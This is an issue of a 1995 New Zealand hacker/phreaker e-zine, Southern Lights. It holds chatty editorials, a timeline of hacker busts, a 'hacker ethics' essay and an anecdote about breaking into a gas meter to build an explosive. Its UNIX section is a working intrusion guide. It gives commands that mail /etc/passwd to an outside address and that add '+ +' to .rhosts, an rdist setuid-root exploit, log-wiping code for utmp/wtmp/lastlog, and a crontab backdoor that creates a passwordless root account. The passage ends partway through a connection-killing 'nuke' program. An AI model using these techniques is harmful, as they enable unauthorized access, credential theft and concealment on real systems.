Copy Link
Add to Bookmark
Report
Southern Lights Magazine Issue 004
[ 01/04/95 SLi]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Welcome ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, amazing! SLi IV. Let's see if we can keep this up.
If you want a letter to the editor or something like that
in here, send it (or any comments, etc.. ) to:
SLi
PO Box 3030
Onekawa
Napier
New Zealand
OR
Internet E-mail Address:
HACKER_M@IX.WCC.GOVT.NZ
OR
Call SLi BBS if you can find where it is
Please read SLi I, II & III if you have trouble with
any terms in this mag.
SLi mag written by New Zealanders for New Zealanders!
Oh, before I forget, we have a NEW editor (I'm still here tho').
CyntaxEra is now a Co-Editor and designer of the mag. It's
outlay and overall presentation is her domain, well unless I
get bossy.
^L
[ 01/04/95 SLi]
I N D E X
---------
Welcome ........................... Eon
The Rules ......................... Eon
Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
The Police ........................ Eon
Time Line ......................... Eon
Books 2 Read ...................... SLi
[In]Famous Quotes ................. Eon
Honour ............................ Eon
Unix .............................. Compiled by Eon
Busted 4 Nothing .................. Eon/Cyntaxera
The SLi Archive Subject list ...... Eon
Fake Mail ......................... Eon
Elements of Data Deprotection ..... Thorium
Review: 'ToT' ..................... CyntaxEra
SLi ............................... Eon
COCOT Phreaking in NZ ............. CyntaxEra
SmYte List ........................ SLi
Editors Knotez .................... Eon
^L
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Rules ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Okay, here are the rules for the SLi mag.
The entire mag is (C)opyright 1995 SLi
(1)
If you are working for a business that has some interest in the information
contained in this mag, you must send WRITTEN notification that you are in
possession of this [or any of the other SLi mags] to the following address:
SLi-Comp
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
If you send an IBM formatted 720 disk and a SASE, we will send you the next
SLi mag. A donation of $5 is asked for however - as YOU can aford it (unlike
SOME of our readers).
(2)
This mag may not be edited, and no SINGULAR part may be quoted in any way!
However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be
expected to be paid to the following address BEFORE any such reproduction.
SLi-Payment
PO Box 3030
Onekawa
Napier
New Zealand
Enclose your name, your company's name, address, and phone/fax number.
The fee must be paid in $CASH$. I, the editor, reserve the right
to revoke your rights to reproduce this mag at ANY time.
You may, if you are NOT a company, business or in anyway connected to law
enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies
for no charge.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed
we've managed to get out another issue before anything drastic had happened
to restrict our printing, but even so, tough.
Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the
last issue..)..
Greetz go out to: [in absolutely NO order at all..]
SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to
WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you
still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead,
motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS,
DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent,
UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX,
UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro,
qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby -
(where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d,
Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.
[..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry
- maybe all that p0t actually HAS gone to my head.. ugh. ;)]
Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which
means that there isn't much to talk about.. oh yeah...
CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)
Doesn't that show how little there is to say this time round?! Uh, I guess
I could beg and plead for pieces of gossip to head our way (yup, even BBS ads
will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em..
Well, if there's enuf submitted, that is..)..
Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as
HONEST as I could be without being TOO cutting (I got told I was a little harsh
with the comments, but I felt that they were appropriate - it's only an opinion
so don't take it personally.. =) ). Well, to you other readerz out there who
aren't in ToT, give it a read - you may find it amusing.. =)
Oh, it's a pity that I've been informed that ToT#2 was going to be the last
issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we
hadn't really started out TOO magnificently* Mind you... it was a start].
Telco seems to be backing down for a bit, but that doesn't mean that they've
stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)
[Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she
says. She's a nice woman - just a bit slY <excuse the pun>
WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude
ISNT. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR]
Special note to "THE FLY" - You've pissed me off once too often, and after
hearing of your comments, you'll get what's coming for you. Oh, and I'm sure
you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were
doing a bit of a crackdown on fone-phreaks and your name popped up somehow.
Pity they're too far away to seriously do something about it - don't think
they could be bothered, huh?
That's about it from me.. for now
'Till next issue (well, next article anyway.. ;) )... over and OUT.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ The Police ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
-The Police-
Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...
We ALL know police, dont we? Now, I thought that police were there to pro-
tect, BUT....
It all happened one EARLY morning - about 5am. We were, uh, well, breaking
into a gas-meter to get some gas to fill a rubbish bag with to make a bit of
a large explosion somewhere in the metropoliton area. Now, sadly :( me and
another individual were smacking the shit outta this gas meter's pipes and
we hear a car driving towards where we were. We [by the way, we were in a
car - not at that moment, obviously] dropped the crowbar [thats what we were
talking to the gas-meter with] and hid behind the car.
Unfortunatly, the police had seen us, so I [holdin' a spanner] tried to look
like we were undoing the wheel [There was a stone in it. Well, that was the
story anyway]. Now, the cops asked us questions, searched our car for drugs
and basicly harrassed us until EXACTLY 6:30am [it mighta been 5:30am].
Anyway, I was informed that that is the EXACT time the police go home, so all
we were was a 'time-waster'.
I must admit that I have lost some respect I had for the boys/'girl-boys' in
blue. The car-driver's mom got called and he got in shit. We had to walk
back and pick up the crowbar we had left 'hidden in plain sight' - they some-
how managed to miss it - and basically, we had a really bad day [morning]...
BTW - Cops ask really STUPID questions!
Cop: Why is there broken glass near that car??
Me: I dunno, but if you were a _real_ detective, you would notice
that the broken glass is nowhere near the broken window.
Obviously the car has been moved since the glass was broken so
we CAN'T have done it.
Cop: You ever had a run in with us before?
Me: [thinking]
What a fucking stupid question to ask! I told you my name so
why don't you just look it up?
[saying]
Just the usual - being out late and getting stopped. Nothing
really.
Cop from
Vice squad: Been smoking any dak? [dak = pot/green plant/cannibis ]
A friend: I wish.
Well, I have no problems with police, except that _SOME_ policewomen have a
really bad attitude and that some policemen thing that they are god's gift
to the world. But, the police do a job that MUST be done. I salute them
for it... BUT, Mr/Ms Police Officer, take my advice and do what is right-
eous and just not necessarally what is legal.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ TIME LINE ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, here we have it. A timeline of events in the H/P world.
Now, I might have screwed up a few things so please no mail bombs
and bear with me.
Information and Dates have been taken from:
"The Hacker Crackdown" ---- Bruce Sterling
"THEFT OF COMPUTER SOFTWARE ____ William J. Cook,
A NATIONAL SECURITY THREAT" Assistant U.S. Attorney
PGP DOX ---- Author Unknown at time of
Publication.
"The History of LOD/H ____
Revision #3 May 1990" Lex Luthor
U.S. Newswire ---- Author Unknown at time of
Articles Publication.
News Artical ____ Barbara E. McMullen and
Pump-Con Bust John F. McMullen
-03/11/1992-
and finally, my own knowlege.
KEY:
Okay, the only major thing I should explain is, the use of
"Sometime." and "Sometime?". A question mark means I'm not sure
WHEN it happened in that year. A "." means I'm not sure of which
month things happened, but it was in this order.
-=[ Our History ]=-
1865:
U.S. Secret Service (USSS) founded.
1876:
Alexander Graham Bell invents telephone.
1878:
First teenage males flung off phone system by enraged
authorities.
1939:
"Futurian" science-fiction group raided by Secret
Service.
1971:
Yippie phone phreaks start YIPL/TAP magazine.
1972:
*Ramparts* magazine seized in blue-box rip-off
scandal.
1978:
Ward Christenson and Randy Suess create first
personal computer bulletin board system.
1982:
William Gibson coins term "cyberspace."
1982:
"414 Gang" raided.
1983-1984:
AT&T dismantled in divestiture.
1984:
Congress passes Comprehensive Crime Control Act
giving USSS jurisdiction over credit card fraud and
computer fraud.
1984:
the U.S. Department of Commerce placed expanded export
controls on computer software as part of its general
protection of technical data deemed vital to the
national defense and security of the United States.
1984:
"Legion of Doom" formed.
January. "PLOVERNET" went online. [A H/P BBS]
Sometime? "LOD BBS" goes online.
Sometime? Groups such as "Fargo 4A" and "Knights of Shadow"
form.
Sometime May?. "KOS" breaks up.
1984:
*2600: The Hacker Quarterly* founded.
1984:
*Whole Earth Software Catalog* published.
1985:
First police "sting" bulletin board systems
established.
1985:
Whole Earth eLectronic Link computer conference (WELL)
goes on-line.
1986:
Computer Fraud and Abuse Act passed in USA.
1986:
Electronic Communications Privacy Act passed in US.
1987:
Chicago prosecutors form Computer Fraud and Abuse
Task Force.
July/September. A Chicago youth attacked AT&T computers at Bell Labs
in Illinois and New Jersey, at a NATO missile support
site in North Carolina, and at Robbins Air Force Base.
1988:
July. Secret Service covertly videotapes "SummerCon" hacker
convention.
September. "Prophet" cracks BellSouth AIMSX computer network and
downloads E911 Document to his own computer and to
Jolnet.
September. AT&T Corporate Information Security informed of
Prophet's action.
October. Bellcore Security informed of Prophet's action.
October. Scotland Yard arrested an English attacker who had
broken into over 200 military, corporate, and
university computers in the United States and Europe.
November 2. A college undergraduate planted a computer virus that
temporarily disabled 6,000 computers on the Internet
[* The Internet Worm *]
December. A search warrant filed by U.S. Customs agents in
Chicago disclosed that a confederate of the Yugoslav
Consul-General in Chicago was using a hacker to attack
defense contractors by remote access in order to steal
computerized information. According to the affidavit,
the information obtained by the hacker was
subsequently smuggled out of the United States in
diplomatic pouches with the help of the Counsel-
General.
1989:
January. Prophet uploads E911 Document to Knight Lightning.
February 25. Knight Lightning publishes E911 Document in *Phrack*
electronic newsletter.
March. It was disclosed that West German hackers sponsored
by Eastern Bloc intelligence agencies had been
systematically searching for classified information
on Government computers throughout the United States
through a weakness in a computer network at a
California university.
[* Pengo and Operation Equilizer *]
March. A member of the Soviet military mission in Washington,
DC, was arrested and expelled from the United States
for attempting to obtain technical information about
how U.S. Government classified information is secured
in computers.
April. Canada expelled 19 Soviet diplomats for wide-ranging
espionage operations to obtain Canadian defense
contractor information for military and commercial
purposes.
May. Chicago Task Force raids and arrests "Kyrie."
June. "NuPrometheus League" distributes Apple Computer
proprietary software.
June 13. Florida probation office crossed with phone-sex line in
switching-station stunt.
July. "Fry Guy" raided by USSS and Chicago Computer Fraud
and Abuse Task Force. July. Secret Service raids
"Prophet," "Leftist," and "Urvile" in Georgia.
1990:
Sometime? PGP (Pretty Good(tm) Privacy) created by
Philip Zimmermann.
January 15. Martin Luther King Day Crash strikes AT&T
long-distance network nationwide.
January 18-19. Chicago Task Force raids Knight Lightning in
St. Louis.
January 24. USSS and New York State Police raid "Phiber Optik,"
"Acid Phreak," and "Scorpion" in New York City.
February 1. USSS raids "Terminus" in Maryland.
February 3. Chicago Task Force raids Richard Andrews' home.
February 6. Chicago Task Force raids Richard Andrews' business.
February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile.
February 9. Chicago Task Force arrests Knight Lightning.
February 20. AT&T Security shuts down public-access "attctc"
computer in Dallas.
February 21. Chicago Task Force raids Robert Izenberg in Austin.
March 1. Chicago Task Force raids Steve Jackson Games, Inc.,
"Mentor," and "Erik Bloodaxe" in Austin.
May 7,8,9. USSS and Arizona Organized Crime and Racketeering
Bureau conduct "Operation Sundevil" raids in
Cincinnatti, Detroit, Los Angeles, Miami, Newark,
Phoenix, Pittsburgh, Richmond, Tucson, San Diego,
San Jose, and San Francisco.
May. FBI interviews John Perry Barlow re NuPrometheus case.
June/July. Mitch Kapor and Barlow found Electronic Frontier
Foundation; Barlow publishes *Crime and Puzzlement*
manifesto. [*The official EFF "about.eff" says
EFF founded in July*]
July 10. Members in LOD pleed guilty
July 24-27. Trial of Knight Lightning.
1991:
Sometime? US Senate Bill 266, a omnibus anti-crime bill,
had an unsettling measure buried in it.
If this non-binding resolution had become real
law, it would have forced manufacturers of secure
communications equipment to insert special "trap
doors" in their products, so that the US Government
can read anyone's encrypted messages.
This measure was defeated after rigorous protest from
civil libertarians and industry groups.
March 25-28. Computers, Freedom and Privacy conference in San
Francisco.
May 1. Electronic Frontier Foundation, Steve Jackson, and
others file suit against members of Chicago Task
Force.
July 1-2. Switching station phone software crash affects
Washington, Los Angeles, Pittsburgh, San Francisco.
July 8. MOD indictment's filed aganced MOD members Julio
Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt,"
Mark Abene, aka. "Phiber Optik," Elias Ladopoulos,
aka. "Acid Phreak," and Paul Stira, aka. "Scorpion,"
February. CPSR Roundtable in Washington, D.C.
September 17. AT&T phone crash affects New York City and three
airports.
1992:
Sometime? FBI Digital Telephony wiretap proposal was introduced
to Congress. It would require all manufacturers of
communications equipment to build in special remote
wiretap ports that would enable the FBI to remotely
wiretap all forms of electronic communication from FBI
offices.
March 11. New York Police Department has announced the arrest of
Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
J. Woodard, 18 for the alleged crimes of Unauthorized
Use Of A computer and Attempted Computer Trespass,
both misdemeanors. Also arrested was Jason A. Brittain
22 in satisfaction of a State of Arizona Fugitive From
Justice warrant. The arrests took place in the midst
of "PumpCon".
1993:
Sometime. SLi BBS goes up in NZ.
March 21. SLi gets national TV coverage from TVNZ.
April 16th. US Government-built encryption device, called the
"Clipper" chip, containing a new classified NSA
encryption algorithm. The Government is encouraging
private industry to design it into all their secure
communication products. The catch: At the time of
manufacture, each Clipper chip will be loaded
with its own unique key, and the Government gets to
keep a copy.
June. DC busts - A 2600 meeting is broken up by mall cops
and police.
1994:
March. TNO [The New Order] gets busted; Flatline BBS is
raided.
Sometime. Unlucky person nailed in Auckland, NZ, for around
$250,000 of fone fraud concerning NZ Telecom
($200,000) and AT&T ($40,000).
Sometime. Phreak in Wellington busted for beige boxing by
Clear Communications, NZ.
Sometime. Big Calling Card investigation in NZ - "Motley" in
Sweeden is busted in conjunction with CC'z - no major
charges are laid.
June 10. "Deathstar" gets busted - no charges laid.
August 6. "Tooph" makes front page news with his alliance conf
calls - One was a call to NZ for 293 mins costing
$306.
Sometime. "MrPurple" busted for US$40,000 worth of conference
charges. [* At time of publication, in jail =( *]
Late/Early95. NZ Telecom hassles Wellington phreaks about VMB
hacking. [how lame!].
1995:
January. Wellington H/P'ers hunted down by Victoria University
(with a little help from local cops) 'cos someone got
'OPERATOR' on their boxes.
[Yeah, wasn't 'root' but it scared 'em enuf!]
Febuary 17. Hacker Busted in USA for 20.000 credit cards
Kevin Mitnick aka Condor
March 22. S.A.M.S.O.N meeting in Wellington, New Zealand
"1. To identify interested parties in joining our
proposed organisation - namely SAMSON - Software
and Modem System Operators Network!
2. To establish and agree on a formal code of ethical
practices for the successful running of a public
BBS." [* well they will wanna shut me down, wont
they! :P *]
-eof-
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ [In]Famous Quotes ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
----Eon,---Grasshopper-+-others---in--a---car----
Eon: "Let's go crash some place."
Grasshopper: "I hope you meant as in sleeping."
Grasshopper: "He's `Joe-average'"
Eon: "He's `Joe-BELOW average'"
George: "I'll lock you out of my Bulletin Board and give you twit
access forever! Ahh ahahahaha!" [spoken in a voice like he
had an award winning carrot up his ass]
Cardinal: "Dial '111' and make a cop come."
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Honor ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Honor.
For a hacker to justify his/her actions, he/she must have a guideline of rules
of morals - a sense of honour. Some do, some dont, but I hope to show you
what Hack/Phreak people's ethics should be, in my opinion.
1. For a start, injuring a single person;
CC abuse is wrong. It is not ethical. Our fight is not against the
little man or woman - our fight is against the profiteering companies
and hiracial[sp?] government departments. We do not steal from the
poor, and the helpless, and in a sense, that is what CC fraud is most
of the time. Sure, occasionally you get some rich guy with 40 grand
in his account, but those times are few and in between. Basically CC
fraud is out.
<Of course, if a company is "lame" enough to accept a checksum's cre-
dit card - it's up to you!>
Beige boxing is out also, unless you're phreaking from an embassy,
government department or Telecom [AT&T, Telco.. etc...] phone box.
2. You're not a anarchist [in the explosive terms]. It only gives us a bad
name.
3. Destroying data, except for covering your tracks, is out.
4. Your world is that of the computer and the phone. Our world is safe
from the problems of racial prejudice, sexual descrimination, descrim-
inate by what someone says - not what they look like, sound like, or
what there beliefs are.
5. Our word of honour is PERMANENT. If given, NEVER break it. If you do,
you are no more worthy of your position in society as a murderer or a
rapist.
6. Respect all others' points of view - even if it is foolish.
7. NEVER attack anything if it hasn't done anything to you.
[Hmm, does that include kicking poor, little, defenseless PUPPIES!?]
8. Don't talk behind others' backs. If you want to say something, say it to
their face. Only dishonourable people dont tell people what they think,
but tell others instead. <maybe I should take notice of this one!>
Remember, our war is the war that will shape the future. If we are not
ever diligent, we will lose our rights as an individual - we will become
nothing more than a number. Governments love numbers, as do all money
making companies. Protect the little free speech and the few rights we
have left. Protect them well, my brethren, for we will need it one day
more than we will need anything else.
Above all, our war is directed at big businesses and governments, not towards
random people in our streets.
Eon.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ UNIX ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors
can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS
but 486's, 386's, Pentiums, and the like, can run it. SUN box's and VAX's
can run it. In fact, that's the amazing thing about Unix - it's PORTABLE!
Anyway, away from the dribble.
I guess I'll start at the top.
Basic UNIX username/password prompt:
login:
Password:
This CAN be changed. After all, with UNIX, you get the source to everything.
One good thing with UNIX is that the password file is globally readable unless
the system administrator has enabled a shadow password system - not standard
with unix. The passwords are in:
/etc/passwd
Mind you this can be changed also. After all, with UNIX, you get the source
to everything.
A UNIX passwd file looks like this:
root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh
The layout may differ from UNIX's, but this is the standard layout:
Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
You will notice that the second field is the password one. UNIX uses a one-
way password encryption system. When you login, and type your password, it
encrypts your input and compares the users password field to what you entered.
If it is the same, you've got the password right.
Say you want to crack the passwords. You have to do the same. Encrypt a se-
quence of letters/numbers/symbols and compare them to the passsword file.
Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..".
What you get is a dictionary file which looks like this:
autistic
auto
autobiography
autoclave
autocollimate
autocorrelate
autocracy
autocrat
autocratic
autograph
automat
automata
automate
automatic
The reason for this - using dictionary words - is that a LOT of people just
use common words as their passwords. Having to attack "Crack" using every
number/letter/symbol sequence UNIX can handle would take a LONG time.
The names of some good proggies that crack these passwords are:
Program Name File Name <> OS
~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~
Cracker Jack jack13.zip/jack.zip <PC Only - VERY FAST!!>
Killer Cracker kc9??.zip <Anything. After all, you get the
source to it>
Useful commands to type WHENEVER you get onto ANY UNIX system:
[] = Don't type - instructions
* = What you type
This will "type" the password file to your terminal:
[open a capture if on a modem link]
*cat /etc/passwd [or]
*ypcat passwd
This will mail you via internet with the password file:
*cat /etc/passwd |mail -s passwordfile [where you want to send the file to via
internet mail; ie. bloggs@some.where.com]
ypcat passwd | mail -s passwordfile [where you want to send the file to via
internet mail; ie.bloggs@some.where.com]
Also type this:
*echo + + >> ~/.rhosts
This will allow you (if it's installed) for you to type:
*rsh <system.name.you.echoed.that.to> -l <UsernameOfUserYouUsed> /bin/sh -i
Okay, so that is say, the user you echoed + + on was called "bob" on
lame.aol.com, you would type:
*rsh lame.aol.com -l bob /bin/sh -i
This might or might not work, depending on how the system is setup, but if
you were on lame.aol.com, it's a reasonable bet after typing that command you
would then become bob with his rights, and access to his files.
Well I thought about it and decided to put some useful source in here for
those interested.
Okay, this piece of shell script on non-patched systems will give you root.
Upload this file into a directory as <filename>.
When in shell on the UNIX box type:
*chmod 777 <filename>
*./<filename>
*/tmp/." "
If a # appears, type:
*whoami
If it says "root" you have root on that UNIX box.
NB: Because of the way this file is, where ! is wrap the nextline onto that
line and delete the "!" - except for the "#!" on the first line.
---------------------------CUT----------------------------8<------------------
#!/bin/sh
SUID=/tmp/." "
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
-------------------------CUT-------------------------------8<------------------
The program following will hide you on a UNIX box.
It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if
you are root.
-------------------------CUT-------------------------------8<------------------
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>
int f;
void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}
-----------------------------CUT---------------------------8<------------------
When you get root, find where the crontabs are put, and type this:
*cat <WhatYouCallThisFileName> >> <crontabdir>/root
-------------->8--------------Cuthere------------------------------------------
0 1 * * * cp /etc/passwd /var/adm/". "
1 1 * * * chmod +w /etc/passwd
2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd
1 2 * * * mv /var/adm/". " /etc/passwd
2 2 * * * chmod -w /etc/passwd
-------------->8--------------Cuthere------------------------------------------
At 1-2 AM, there will be an account called "blah" with root access every day
created with no password.
This will nuke the IP connection between two computers:
*./nuke <TargetUsers> <ComputerThat'sConnectingTargetComputer> <Port#ToKill>
-------------->8--------------Cuthere------------------------------------------
/*
* nuke.c version 1.0 04/25/92
* by Satanic Mechanic.
* must be root to open raw sockets. this version will kill
* almost any ip connection.
* ----------------------------------------------------------------
* I strongly advise against even compiling this software. It's far
* too dangerous, and the temptation may be there to do some real
* damage with it. Read and learn, that's it, eh? -concerned
* ----------------------------------------------------------------
*
*/
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/tcp.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#define DEFAULT_UNREACH ICMP_UNREACH_PORT
char *icmp_unreach_type[] = {
"net",
"host",
"protocol",
"port",
"frag",
"source",
"destnet",
"desthost",
"isolated",
"authnet",
"authhost",
"netsvc",
"hostsvc"
};
#define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))
int resolve_unreach_type(arg)
char *arg;
{
int i;
for (i=0; i <MAX_ICMP_UNREACH; i++) {
if (!strcmp(arg,icmp_unreach_type[i])) return i;
}
return -1;
}
int resolve_host (host,sa)
char *host;
struct sockaddr_in *sa;
{
struct hostent *ent ;
bzero(sa,sizeof(struct sockaddr));
sa->sin_family = AF_INET;
if (inet_addr(host) == -1) {
ent = gethostbyname(host);
if (ent != NULL) {
sa->sin_family = ent->h_addrtype;
bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length);
return(0);
}
else {
fprintf(stderr,"error: unknown host %s\n",host);
return(-1);
}
}
return(0);
}
in_cksum(addr, len) /* from ping.c */
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum),
* we add sequential 16 bit words to it, and at the end, fold
* back all the carry bits from the top 16 bits into the lower
* 16 bits.
*/
while( nleft > 1 ) {
